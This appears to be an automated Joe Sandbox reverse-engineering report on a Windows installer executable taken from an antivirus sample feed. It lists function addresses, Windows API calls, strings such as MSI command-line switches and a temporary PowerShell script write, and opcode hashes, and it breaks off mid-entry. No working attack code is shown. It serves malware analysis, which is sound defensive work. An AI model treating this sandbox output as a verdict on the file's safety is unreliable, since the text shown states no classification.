                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: _wcsrchr$Process$CurrentWow64
                                                    • String ID: "%s" $ /fvomus //$ /i //$ /p //$ EXE_CMD_LINE="%s "$ TRANSFORMS=":%d"$%s AI_SETUPEXEPATH="%s" SETUPEXEDIR="%s"$.x64
                                                    • API String ID: 657290924-2074823060
                                                    • Opcode ID: d87f7846e5b6d78904ea2ddaa2ad49903afd4d9b9e2c9c8a515f0b5d8c7bcd52
                                                    • Instruction ID: dd387a632a84e0ce26ab48c601ea4cecfd262dda576224bf4abf009c2ec9d3cb
                                                    • Opcode Fuzzy Hash: d87f7846e5b6d78904ea2ddaa2ad49903afd4d9b9e2c9c8a515f0b5d8c7bcd52
                                                    • Instruction Fuzzy Hash: EBF1E531A006059FEB00EF68C844BAEBBB5BF45314F18866EE815AB3D1DB78DD04CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0038B200 Relevance: 21.4, APIs: 4, Strings: 8, Instructions: 358libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00000043), ref: 0038B328
                                                    • GetProcAddress.KERNEL32(00000000,InitializeEmbeddedUI), ref: 0038B341
                                                    • GetProcAddress.KERNEL32(00000043,ShutdownEmbeddedUI), ref: 0038B34D
                                                    • GetProcAddress.KERNEL32(00000043,EmbeddedUIHandler), ref: 0038B35A
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$HeapInit_thread_footer$AllocateLibraryLoadProcess
                                                    • String ID: build $20.2$2c3f1cf9$EmbeddedUIHandler$INAN$InitializeEmbeddedUI$SELECT `Data` FROM `Binary` WHERE `Name` = 'InstallerAnalytics.dll'$ShutdownEmbeddedUI
                                                    • API String ID: 2564778481-3504904618
                                                    • Opcode ID: e463315bda655802bda822a13669695585ed6b10bbf7a0b4ec2074e979d9028f
                                                    • Instruction ID: 2764d0fbbe562a088b7e4ff52cb18d64088b123dcd828ff611466e84947d3100
                                                    • Opcode Fuzzy Hash: e463315bda655802bda822a13669695585ed6b10bbf7a0b4ec2074e979d9028f
                                                    • Instruction Fuzzy Hash: 8BD1B271D0070A9FDB15EFA8CC45BEEBBB4FF44310F144669E915AB291EB74AA04CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0035EE80 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 267libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory,D13B3340,005CADDC,?,?,?,?,?,?,?,?,?,?,?,D13B3340), ref: 0035EEFB
                                                    • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 0035EF01
                                                    • LoadLibraryW.KERNEL32(?,.dll,-00000001,00000000,005B329C,00000000,00000000,00000000), ref: 0035F08B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$AddressProc
                                                    • String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
                                                    • API String ID: 1469910268-2454113998
                                                    • Opcode ID: 24d0f838a3010f917da8437d34494ce82adf6a99deae6880f5bfece7755a6ac1
                                                    • Instruction ID: 53086d2d0b1ff5c85fe9d6ebd93a8a55273a700d60bf6fa4b65f7cf170ade7b8
                                                    • Opcode Fuzzy Hash: 24d0f838a3010f917da8437d34494ce82adf6a99deae6880f5bfece7755a6ac1
                                                    • Instruction Fuzzy Hash: 7AB17071D04209DFDB16DFA8D845FEEBBB5FF48311F154129E811A72A1DB70AA48CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0035E620 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 233libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory), ref: 0035E62E
                                                    • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 0035E634
                                                    • LoadLibraryW.KERNEL32(combase.dll,CoIncrementMTAUsage,?,?), ref: 0035E667
                                                    • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 0035E66D
                                                    • LoadLibraryW.KERNEL32(?,.dll,00000004,-00000001,00000000,005B329C,00000000,00000000,00000000), ref: 0035E78D
                                                    • GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 0035E7D6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
                                                    • API String ID: 2574300362-2454113998
                                                    • Opcode ID: ee2650f39ad9f2de7fd6b2c8b51a49e5099248134330a130398e7d94e543cdcd
                                                    • Instruction ID: fd2902a999c45727c501acf36df0afebb47ab69efffd9e262033020c3fa43cc1
                                                    • Opcode Fuzzy Hash: ee2650f39ad9f2de7fd6b2c8b51a49e5099248134330a130398e7d94e543cdcd
                                                    • Instruction Fuzzy Hash: 81917031D00209DFDF1ADFA8C895FEDBBB5BF58701F254129E811A72A1DB74AA48CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00367BC0 Relevance: 19.7, APIs: 10, Strings: 1, Instructions: 460stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ParentWindowlstrcmp
                                                    • String ID: #32770
                                                    • API String ID: 3676684576-463685578
                                                    • Opcode ID: ac9a1682a7b00c74226c5a56e6167a539ad12fbdf8a868dd4fe442306b5a6fd3
                                                    • Instruction ID: b466ae4c7392c32d27114b610401e6c9d3605287e270381a93bdcd347dd0c4cc
                                                    • Opcode Fuzzy Hash: ac9a1682a7b00c74226c5a56e6167a539ad12fbdf8a868dd4fe442306b5a6fd3
                                                    • Instruction Fuzzy Hash: A7029F70A04208EFDB16CFA4C948FAEBBF5FF49718F148558F405AB2A4DB75A944CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0047B080 Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 410libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004965B0: GetSystemDefaultLangID.KERNEL32(D13B3340,0000004C,?,00000048,?), ref: 004965E6
                                                    • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,00000000), ref: 0047B1E3
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0047B1EA
                                                    • __Init_thread_footer.LIBCMT ref: 0047B201
                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,00000000), ref: 0047B220
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressCurrentDefaultHandleInit_thread_footerLangModuleProcProcessSystem
                                                    • String ID: IsWow64Process2$Not selected for install.$Search result:$Searching for:$Undefined$Wrong OS or Os language for:$kernel32
                                                    • API String ID: 52476621-4272450043
                                                    • Opcode ID: dd95b959f237a3f6a14a8c8572b9157c36130adf7df5c62ffe1d2598d2c0978c
                                                    • Instruction ID: 64b86892f7c012c8b2fb4922af424784fb9dabff4c668e8cdcb1f2a5282814d8
                                                    • Opcode Fuzzy Hash: dd95b959f237a3f6a14a8c8572b9157c36130adf7df5c62ffe1d2598d2c0978c
                                                    • Instruction Fuzzy Hash: 57F1A170900604DFDB10DFA9C994BAEBBB1FF44314F14825EE41AAB391DB39A846CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00385200 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 229windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateWindowExW.USER32(00000000,tooltips_class32,00000000,80000063,80000000,80000000,80000000,80000000,?,00000000,00000000,D13B3340), ref: 00385288
                                                      • Part of subcall function 003672B0: SetWindowLongW.USER32(?,000000FC,00000000), ref: 003672E6
                                                    • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 0038538B
                                                    • SendMessageW.USER32(00000000,00000439,00000000,0000002C), ref: 0038539F
                                                    • SendMessageW.USER32(00000000,00000421,00000003,?), ref: 003853B4
                                                    • SendMessageW.USER32(00000000,00000418,00000000,0000012C), ref: 003853C9
                                                    • SendMessageW.USER32(?,000000D6,-00000001,00000000), ref: 003853E0
                                                    • GetWindowRect.USER32(?,?), ref: 00385412
                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 00385474
                                                    • SendMessageW.USER32(00000000,00000411,00000001,0000002C), ref: 00385484
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$CreateLongRect
                                                    • String ID: ,$tooltips_class32
                                                    • API String ID: 1954517558-3856767331
                                                    • Opcode ID: 764643ce795d52fac6647dcf36d9169c5c5222a7e347f64545254d8d19ffb554
                                                    • Instruction ID: 1851afeb0524c71726f0c1289297c01fc4f0d660b96e4b2b8c71a7ba5e552d0c
                                                    • Opcode Fuzzy Hash: 764643ce795d52fac6647dcf36d9169c5c5222a7e347f64545254d8d19ffb554
                                                    • Instruction Fuzzy Hash: 039121B1A00308AFDB15DFA5CC95BAEBBF9FB48700F10852AF516EA691D774A904CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00365A10 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 119COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(0063E7BC,D13B3340,00000000,?,?,?,?,?,?,>R6,0054B23D,000000FF), ref: 00365A4D
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00365AC8
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00365B6E
                                                    • LeaveCriticalSection.KERNEL32(0063E7BC), ref: 00365BC3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalCursorLoadSection$EnterLeave
                                                    • String ID: 0$>R6$AtlAxWin140$AtlAxWinLic140$WM_ATLGETCONTROL$WM_ATLGETHOST$xS[
                                                    • API String ID: 3727441302-534179103
                                                    • Opcode ID: 894f8fe736f40fefaff207546356a474d38269db4b6d4f84846084eb2c37ec0c
                                                    • Instruction ID: 42cbee053a269e4da8cade0d11c39600db99aa0e9ffffb4b59bb4cc72973745c
                                                    • Opcode Fuzzy Hash: 894f8fe736f40fefaff207546356a474d38269db4b6d4f84846084eb2c37ec0c
                                                    • Instruction Fuzzy Hash: AD5102B0C053199FDB11CFA4D848BEEBFF9BF08314F14416AE404B7290DBB56A048BA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C9970 Relevance: 16.7, APIs: 11, Instructions: 170COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 003C99B7
                                                    • GetParent.USER32 ref: 003C99CD
                                                    • GetWindowRect.USER32(00000000,?), ref: 003C99D8
                                                    • GetParent.USER32(00000000), ref: 003C99E0
                                                    • GetWindow.USER32(?,00000004), ref: 003C9A12
                                                    • GetWindowRect.USER32(00000000,?), ref: 003C9A20
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 003C9A2D
                                                    • MonitorFromWindow.USER32(00000000,00000002), ref: 003C9A45
                                                    • GetMonitorInfoW.USER32(00000000,00000000), ref: 003C9A5F
                                                    • SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015,?,00000004), ref: 003C9B0D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$LongMonitorParentRect$FromInfo
                                                    • String ID:
                                                    • API String ID: 1820395375-0
                                                    • Opcode ID: eb770c94da59cce8c7f026b3e7840fcd5a3ec8b5b2dcce5e66222e3bc4469f49
                                                    • Instruction ID: e486e64a22fcd2b3c92b583acd144241f2a10e2e8491b06c503465ad0541b6f5
                                                    • Opcode Fuzzy Hash: eb770c94da59cce8c7f026b3e7840fcd5a3ec8b5b2dcce5e66222e3bc4469f49
                                                    • Instruction Fuzzy Hash: C7515F72D041199FDB21CF68DD49B9EBBB9FB48710F25522AE815E3291DB30AD00CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004A10D0 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 302libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0042A630: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 0042A671
                                                    • GetLastError.KERNEL32(D13B3340,?,?,?,005921DD,000000FF,?,00484362,?), ref: 004A113D
                                                    • GetProcAddress.KERNEL32(00000000,GetPackagePath), ref: 004A12CD
                                                    • GetProcAddress.KERNEL32(00000000,GetPackagePath), ref: 004A1326
                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,005921DD,000000FF,?,00484362,?), ref: 004A1414
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$DirectoryErrorFreeLastLibrarySystem
                                                    • String ID: GetPackagePath$Kernel32.dll$neutral$x64$x86
                                                    • API String ID: 2155880084-4043905686
                                                    • Opcode ID: 6133a6ee80fc06ef81044898710b67c4996b831ee09905e1f625ade6182a8713
                                                    • Instruction ID: 9fd08c1691975b9f844d4b661dbf80c060d9f93226e2dd1cc8ff1ba0e05c41b2
                                                    • Opcode Fuzzy Hash: 6133a6ee80fc06ef81044898710b67c4996b831ee09905e1f625ade6182a8713
                                                    • Instruction Fuzzy Hash: C3C18D70A00209DFDF04CFA8C984B9EBBB1FF1A314F148269E805EB3A1EB759945CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00482210 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 283COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00476E80: LoadLibraryW.KERNEL32(Shlwapi.dll,?,?,?,?,00482271,?,D13B3340,?,?), ref: 00476E9B
                                                      • Part of subcall function 00476E80: GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00476EB1
                                                      • Part of subcall function 00476E80: FreeLibrary.KERNEL32(00000000), ref: 00476EEA
                                                    • GetEnvironmentVariableW.KERNEL32(APPDATA,?,00000104,D13B3340,?,?), ref: 00482450
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressEnvironmentFreeLoadProcVariable
                                                    • String ID: AI_BOOTSTRAPPERLANGS$APPDATA$AppDataFolder$PROGRAMFILES$ProgramFiles$ProgramFilesFolder$Shell32.dll$Shlwapi.dll
                                                    • API String ID: 788177547-1020860216
                                                    • Opcode ID: 8c7e077d2cce1d14b5c128a4a509878a5a29ca19a7780b800cdbbf8c267c5533
                                                    • Instruction ID: f234b90313971f3a86adb9e79c47c006286d86406bdbe5a9fea1adee3345a2bc
                                                    • Opcode Fuzzy Hash: 8c7e077d2cce1d14b5c128a4a509878a5a29ca19a7780b800cdbbf8c267c5533
                                                    • Instruction Fuzzy Hash: B1913370A002059FDB14EF64CD59BAFB7A6FF20310F1049AAE80697391EB799E45CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004A6890 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 178fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                      • Part of subcall function 0035A140: FindResourceW.KERNEL32(00000000,?,00000006,?,?,000000A0,80070057,8007000E,80004005,00371A24,00000000,?,?,?,*.*), ref: 0035A163
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,ps1,ps1,00000003,?,00484B98), ref: 004A6983
                                                    • WriteFile.KERNEL32(00000000,0000FEFF,00000002,?,00000000), ref: 004A69C7
                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 004A69E4
                                                    • CloseHandle.KERNEL32(00000000), ref: 004A69FE
                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,00000000), ref: 004A6A3D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: File$CloseHandleInit_thread_footerWrite$CreateFindHeapProcessResource
                                                    • String ID: <3[$Unable to get temp file $Unable to save script file $ps1
                                                    • API String ID: 2821137686-4084439290
                                                    • Opcode ID: 527ff08d428b9134feb5de8a5ce82c361365cafd9b3bbe141d967c1cdcb75b07
                                                    • Instruction ID: edf51454c17da5db46760b27dd7ad38f0f2cbdd35c41f3a79f1e9ccef9451750
                                                    • Opcode Fuzzy Hash: 527ff08d428b9134feb5de8a5ce82c361365cafd9b3bbe141d967c1cdcb75b07
                                                    • Instruction Fuzzy Hash: 3D51E770900649AFDB10CB68CD49FAFBBB8BF16314F148259E501BB3D1D7749A08DBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0036D0A0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 150fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __Init_thread_footer.LIBCMT ref: 0036D18F
                                                      • Part of subcall function 00520328: EnterCriticalSection.KERNEL32(00637DCC,?,?,0035ACA7,006389FC,005A5FA0), ref: 00520332
                                                      • Part of subcall function 00520328: LeaveCriticalSection.KERNEL32(00637DCC,?,0035ACA7,006389FC,005A5FA0), ref: 00520365
                                                      • Part of subcall function 00520328: RtlWakeAllConditionVariable.NTDLL ref: 005203DC
                                                    • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,?,D13B3342), ref: 0036D1E3
                                                    • CloseHandle.KERNEL32(00000000), ref: 0036D240
                                                      • Part of subcall function 00520372: EnterCriticalSection.KERNEL32(00637DCC,?,?,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 0052037D
                                                      • Part of subcall function 00520372: LeaveCriticalSection.KERNEL32(00637DCC,?,0035AC36,006389FC,D13B3340,?,?,005484ED,000000FF,?,004AC28C,D13B3340,?,?), ref: 005203BA
                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0036D2A7
                                                    • CloseHandle.KERNEL32(00000000,0051D0EC), ref: 0036D2CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
